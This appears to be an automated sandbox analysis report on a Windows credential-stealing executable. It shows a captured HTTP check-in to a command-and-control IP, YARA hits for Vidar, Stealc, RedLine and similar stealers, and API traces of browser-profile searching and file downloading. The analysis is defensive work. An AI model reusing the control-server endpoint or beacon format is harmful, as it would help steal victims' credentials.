Apr 23, 2024 09:27:33.606122017 CEST	469	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH Host: 185.172.128.111 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 38 63 36 65 31 63 61 35 64 65 38 39 39 30 37 31 66 31 38 61 36 61 63 34 64 63 33 33 63 39 32 37 36 32 66 62 32 37 36 35 64 38 36 32 64 64 61 34 34 30 61 61 36 33 36 38 35 36 33 31 62 30 37 32 33 64 39 32 65 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 35 31 38 34 31 39 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 2d 2d 0d 0a Data Ascii: ------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="token"958c6e1ca5de899071f18a6ac4dc33c92762fb2765d862dda440aa63685631b0723d92e0------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="message"5184191------DAFCAAEGDBKJJKECBKFH--
Apr 23, 2024 09:27:33.970809937 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Target ID:	0
Start time:	09:26:53
Start date:	23/04/2024
Path:	C:\Users\user\Desktop\q27UFusYdn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\q27UFusYdn.exe"
Imagebase:	0x400000
File size:	336'384 bytes
MD5 hash:	BB88997D394C01230D90AA731F4E8837
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2177166200.000000000412C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1631316383.0000000004410000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000003.1631316383.0000000004410000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:27:33
Start date:	23/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 2160
Imagebase:	0x2b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	42

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,04127120), ref: 0041625D
GetProcAddress.KERNEL32(74DD0000,041275A0), ref: 00416275
GetProcAddress.KERNEL32(74DD0000,04143120), ref: 0041628E
GetProcAddress.KERNEL32(74DD0000,04143138), ref: 004162A6
GetProcAddress.KERNEL32(74DD0000,041430F0), ref: 004162BE
GetProcAddress.KERNEL32(74DD0000,041430A8), ref: 004162D7
GetProcAddress.KERNEL32(74DD0000,041260A8), ref: 004162EF
GetProcAddress.KERNEL32(74DD0000,04143150), ref: 00416307
GetProcAddress.KERNEL32(74DD0000,041430D8), ref: 00416320
GetProcAddress.KERNEL32(74DD0000,04147468), ref: 00416338
GetProcAddress.KERNEL32(74DD0000,041472E8), ref: 00416350
GetProcAddress.KERNEL32(74DD0000,041275C0), ref: 00416369
GetProcAddress.KERNEL32(74DD0000,04127480), ref: 00416381
GetProcAddress.KERNEL32(74DD0000,04127760), ref: 00416399
GetProcAddress.KERNEL32(74DD0000,04127680), ref: 004163B2
GetProcAddress.KERNEL32(74DD0000,04147408), ref: 004163CA
GetProcAddress.KERNEL32(74DD0000,04147300), ref: 004163E2
GetProcAddress.KERNEL32(74DD0000,041262B0), ref: 004163FB
GetProcAddress.KERNEL32(74DD0000,041274C0), ref: 00416413
GetProcAddress.KERNEL32(74DD0000,04147498), ref: 0041642B
GetProcAddress.KERNEL32(74DD0000,041473D8), ref: 00416444
GetProcAddress.KERNEL32(74DD0000,041474E0), ref: 0041645C
GetProcAddress.KERNEL32(74DD0000,041474F8), ref: 00416474
GetProcAddress.KERNEL32(74DD0000,041274A0), ref: 0041648D
GetProcAddress.KERNEL32(74DD0000,04147510), ref: 004164A5
GetProcAddress.KERNEL32(74DD0000,04147480), ref: 004164BD
GetProcAddress.KERNEL32(74DD0000,04147318), ref: 004164D6
GetProcAddress.KERNEL32(74DD0000,041474B0), ref: 004164EE
GetProcAddress.KERNEL32(74DD0000,041475D0), ref: 00416506
GetProcAddress.KERNEL32(74DD0000,041474C8), ref: 0041651F
GetProcAddress.KERNEL32(74DD0000,041473F0), ref: 00416537
GetProcAddress.KERNEL32(74DD0000,04147420), ref: 0041654F
GetProcAddress.KERNEL32(74DD0000,04147360), ref: 00416568
GetProcAddress.KERNEL32(74DD0000,041469E0), ref: 00416580
GetProcAddress.KERNEL32(74DD0000,04147528), ref: 00416598
GetProcAddress.KERNEL32(74DD0000,041475B8), ref: 004165B1
GetProcAddress.KERNEL32(74DD0000,04127780), ref: 004165C9
GetProcAddress.KERNEL32(74DD0000,04147540), ref: 004165E1
GetProcAddress.KERNEL32(74DD0000,041277C0), ref: 004165FA
GetProcAddress.KERNEL32(74DD0000,04147378), ref: 00416612
GetProcAddress.KERNEL32(74DD0000,04147438), ref: 0041662A
GetProcAddress.KERNEL32(74DD0000,041274E0), ref: 00416643
GetProcAddress.KERNEL32(74DD0000,04127520), ref: 0041665B
LoadLibraryA.KERNEL32(04147570,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(04147588,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(041475A0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(04147558,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(04147330,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(041473A8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(04147450,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(04147348,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75290000,04127740), ref: 0041670A
GetProcAddress.KERNEL32(75290000,04147390), ref: 00416722
GetProcAddress.KERNEL32(75290000,04143360), ref: 0041673A
GetProcAddress.KERNEL32(75290000,041473C0), ref: 00416753
GetProcAddress.KERNEL32(75290000,04127500), ref: 0041676B
GetProcAddress.KERNEL32(734C0000,041260F8), ref: 00416790
GetProcAddress.KERNEL32(734C0000,04127540), ref: 004167A9
GetProcAddress.KERNEL32(734C0000,04126300), ref: 004167C1
GetProcAddress.KERNEL32(734C0000,04147678), ref: 004167D9
GetProcAddress.KERNEL32(734C0000,04147690), ref: 004167F2
GetProcAddress.KERNEL32(734C0000,041276A0), ref: 0041680A
GetProcAddress.KERNEL32(734C0000,04127820), ref: 00416822
GetProcAddress.KERNEL32(734C0000,041476A8), ref: 0041683B
GetProcAddress.KERNEL32(752C0000,04127560), ref: 0041685C
GetProcAddress.KERNEL32(752C0000,041275E0), ref: 00416874
GetProcAddress.KERNEL32(752C0000,04147600), ref: 0041688D
GetProcAddress.KERNEL32(752C0000,041475E8), ref: 004168A5
GetProcAddress.KERNEL32(752C0000,041276C0), ref: 004168BD
GetProcAddress.KERNEL32(74EC0000,04126328), ref: 004168E3
GetProcAddress.KERNEL32(74EC0000,04126148), ref: 004168FB
GetProcAddress.KERNEL32(74EC0000,04147618), ref: 00416913
GetProcAddress.KERNEL32(74EC0000,041277A0), ref: 0041692C
GetProcAddress.KERNEL32(74EC0000,04127580), ref: 00416944
GetProcAddress.KERNEL32(74EC0000,04126350), ref: 0041695C
GetProcAddress.KERNEL32(75BD0000,04147648), ref: 00416982
GetProcAddress.KERNEL32(75BD0000,04127600), ref: 0041699A
GetProcAddress.KERNEL32(75BD0000,04143320), ref: 004169B2
GetProcAddress.KERNEL32(75BD0000,04147630), ref: 004169CB
GetProcAddress.KERNEL32(75BD0000,04147660), ref: 004169E3
GetProcAddress.KERNEL32(75BD0000,04127620), ref: 004169FB
GetProcAddress.KERNEL32(75BD0000,04127640), ref: 00416A14
GetProcAddress.KERNEL32(75BD0000,041476F0), ref: 00416A2C
GetProcAddress.KERNEL32(75BD0000,04147900), ref: 00416A44
GetProcAddress.KERNEL32(75A70000,041277E0), ref: 00416A66
GetProcAddress.KERNEL32(75A70000,041477B0), ref: 00416A7E
GetProcAddress.KERNEL32(75A70000,041478E8), ref: 00416A96
GetProcAddress.KERNEL32(75A70000,04147888), ref: 00416AAF
GetProcAddress.KERNEL32(75A70000,04147840), ref: 00416AC7
GetProcAddress.KERNEL32(75450000,04127660), ref: 00416AE8
GetProcAddress.KERNEL32(75450000,041276E0), ref: 00416B01
GetProcAddress.KERNEL32(75DA0000,04127700), ref: 00416B22
GetProcAddress.KERNEL32(75DA0000,04147708), ref: 00416B3A
GetProcAddress.KERNEL32(6F090000,04127720), ref: 00416B60
GetProcAddress.KERNEL32(6F090000,04127800), ref: 00416B78
GetProcAddress.KERNEL32(6F090000,04148458), ref: 00416B90
GetProcAddress.KERNEL32(6F090000,041478A0), ref: 00416BA9
GetProcAddress.KERNEL32(6F090000,04148478), ref: 00416BC1
GetProcAddress.KERNEL32(6F090000,041485F8), ref: 00416BD9
GetProcAddress.KERNEL32(6F090000,04148418), ref: 00416BF2
GetProcAddress.KERNEL32(6F090000,041483F8), ref: 00416C0A
GetProcAddress.KERNEL32(75AF0000,04147720), ref: 00416C2B
GetProcAddress.KERNEL32(75AF0000,04143280), ref: 00416C44
GetProcAddress.KERNEL32(75AF0000,041479D8), ref: 00416C5C
GetProcAddress.KERNEL32(75AF0000,04147738), ref: 00416C74
GetProcAddress.KERNEL32(75D90000,041485D8), ref: 00416C96
GetProcAddress.KERNEL32(6D000000,041477E0), ref: 00416CB7
GetProcAddress.KERNEL32(6D000000,04148438), ref: 00416CCF
GetProcAddress.KERNEL32(6D000000,041478B8), ref: 00416CE8
GetProcAddress.KERNEL32(6D000000,04147918), ref: 00416D00

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s\%s\%s, xrefs: 004117DB
%s\%s, xrefs: 00411714
%s\%s, xrefs: 004117FD
%s\*, xrefs: 0041165D
%s%s, xrefs: 00411838

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: e24380de87f91f985b66d320dbe961f46d573dc966b27323ddd82aaccc6d65a1
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: e24380de87f91f985b66d320dbe961f46d573dc966b27323ddd82aaccc6d65a1
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

Google Chrome, xrefs: 0040BDB9
Brave, xrefs: 0040B8A2
Preferences, xrefs: 0040B8BE
\Brave\Preferences, xrefs: 0040B97B

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 566b9f3a6f1d7abdc50b2301bb164a70b833557f1510103ad759021b71cd89c1
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: 566b9f3a6f1d7abdc50b2301bb164a70b833557f1510103ad759021b71cd89c1
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 6CCF35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6CD7F688,00001000), ref: 6CCF35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CCF35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6CCF35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CCF363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CCF369F
__aulldiv.LIBCMT ref: 6CCF36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6CCF3773
EnterCriticalSection.KERNEL32(6CD7F688), ref: 6CCF377E
LeaveCriticalSection.KERNEL32(6CD7F688), ref: 6CCF37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6CCF37C4
EnterCriticalSection.KERNEL32(6CD7F688), ref: 6CCF37CB
LeaveCriticalSection.KERNEL32(6CD7F688), ref: 6CCF3801
__aulldiv.LIBCMT ref: 6CCF3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CCF3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CCF3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CCF394C

Strings

AuthcAMDenti, xrefs: 6CCF3946
QPC, xrefs: 6CCF38FC
GTC, xrefs: 6CCF3912
MOZ_TIMESTAMP_MODE, xrefs: 6CCF35DB
GenuntelineI, xrefs: 6CCF3639

Memory Dump Source

Source File: 00000000.00000002.2196135019.000000006CCF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CCF0000, based on PE: true

Associated: 00000000.00000002.2196118834.000000006CCF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2196180891.000000006CD6D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2196200691.000000006CD7E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2196218365.000000006CD82000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ccf0000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 6b66c6183bc35513990ad3002be1285fe90e1a58bf299606a7a6e16bcbd5e7d8
Instruction ID: fb2b615b93dea1d500324685ac89f3fe067857797c3ee4d52f6cab768816b490
Opcode Fuzzy Hash: 6b66c6183bc35513990ad3002be1285fe90e1a58bf299606a7a6e16bcbd5e7d8
Instruction Fuzzy Hash: 9BB1C871B043209FEB19DF28C44465A77F9FB89704F04892EE699D7790E770D905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNEL32(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\*, xrefs: 0041257D
%s\%s, xrefs: 004125FE
%s\%s, xrefs: 0041264F

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 3136d20d887a74a89511f914be1d743d0b7400d11fdd043764b17f3e6c3f3b96
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: 3136d20d887a74a89511f914be1d743d0b7400d11fdd043764b17f3e6c3f3b96
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: b27c6a61e15bbaddcdd2033fdb989414cee41de35380bbbad86ebbf1a718a96c
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: b27c6a61e15bbaddcdd2033fdb989414cee41de35380bbbad86ebbf1a718a96c
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 492filethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
SetThreadLocale.KERNEL32 ref: 00401AC2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstLocaleNextThreadlstrlen
String ID: \*.*
API String ID: 1950708506-1173974218
Opcode ID: f7f395177250b460b0db6d785d489f319a667289a3f79a53d58222ccd669c59b
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: f7f395177250b460b0db6d785d489f319a667289a3f79a53d58222ccd669c59b
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404CC1, 00404DA0
c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
